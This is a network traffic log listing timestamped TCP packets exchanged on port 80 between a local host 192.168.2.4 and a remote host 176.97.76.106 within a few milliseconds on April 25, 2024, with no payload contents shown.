Apr 25, 2024 12:16:11.268986940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269027948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269049883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269109964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269120932 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269188881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269196033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269253969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269263029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269287109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269335985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269335985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269341946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269391060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269438982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269448042 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269469976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269504070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269563913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269582033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269666910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269690037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269720078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269746065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269785881 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269808054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269831896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269870996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269917011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269917011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.269942999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.269998074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270004034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270073891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270123005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270123005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270126104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270196915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270203114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270256042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270270109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270309925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270323992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270334005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270354033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270401955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270402908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270402908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270446062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270472050 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270502090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270518064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270590067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270590067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270648003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270685911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270715952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270715952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270739079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270765066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270792007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270817041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270858049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270880938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270901918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270905018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270951986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.270971060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.270993948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271018982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271045923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271054983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271100998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271130085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271168947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271202087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271233082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271265984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271271944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271281004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271339893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271342039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271389961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271409988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271425009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271473885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271473885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271497011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271516085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271547079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271559000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271589041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271620989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271635056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271706104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271706104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271712065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271725893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271749020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271781921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271816015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271819115 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271835089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271893978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271898031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271939039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271975994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.271987915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.271990061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272001982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272068024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272069931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272116899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272135019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272207975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272222042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272236109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272265911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272286892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272336960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272376060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272382021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272382021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272406101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272425890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272429943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272464037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272468090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272501945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272511959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272550106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272588015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272625923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272650003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272671938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272699118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272699118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272722960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272722960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272749901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272763968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272813082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272830009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272845030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272891998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272906065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.272907972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.272955894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273045063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273128033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273140907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273200035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273200035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273216009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273228884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273287058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273323059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273330927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273359060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273380041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273384094 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273394108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273442984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273463011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273488998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273533106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273547888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273547888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273550987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273605108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273605108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273617029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273629904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273643017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273674965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273700953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273741007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273760080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273823977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.273824930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.273880005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274053097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274066925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274112940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274163008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274194002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274230957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274244070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274291039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274291039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274302006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274315119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274353981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274367094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274379969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274408102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274425030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274425983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274477005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274491072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274523020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274523020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274547100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274547100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274581909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274650097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274650097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274663925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274703979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274710894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274724960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274782896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274792910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274796009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274856091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.274868965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274931908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274945021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274957895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274988890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.274991035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275018930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275039911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275053978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275069952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275110006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275116920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275130033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275187969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275201082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275203943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275221109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275243044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275244951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275271893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275294065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275315046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275317907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275362015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275362968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275393009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275404930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275439024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275450945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275465012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275484085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275487900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275517941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275549889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275563955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275573969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275629044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275650024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275664091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275712967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275712967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275753021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275774002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275779963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275809050 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275871992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275877953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275892019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275903940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275939941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.275963068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275976896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.275994062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276005030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276053905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276056051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276056051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276117086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276139021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276153088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276165962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276196003 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276212931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276243925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276263952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276264906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276278973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276290894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276314020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276316881 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276354074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276369095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276386976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276405096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276429892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276446104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276460886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276494026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276494026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276504993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276527882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276552916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276575089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276603937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276611090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276626110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276660919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276660919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276679039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276685953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276748896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276748896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276762962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276776075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276809931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276822090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276834965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276859045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276865959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276865959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276902914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276917934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276927948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276952028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.276968956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.276983976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277018070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277031898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277031898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277055979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277092934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277093887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277106047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277152061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277152061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.277226925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277241945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.277286053 CEST	49733	80	192.168.2.4	176.97.76.106
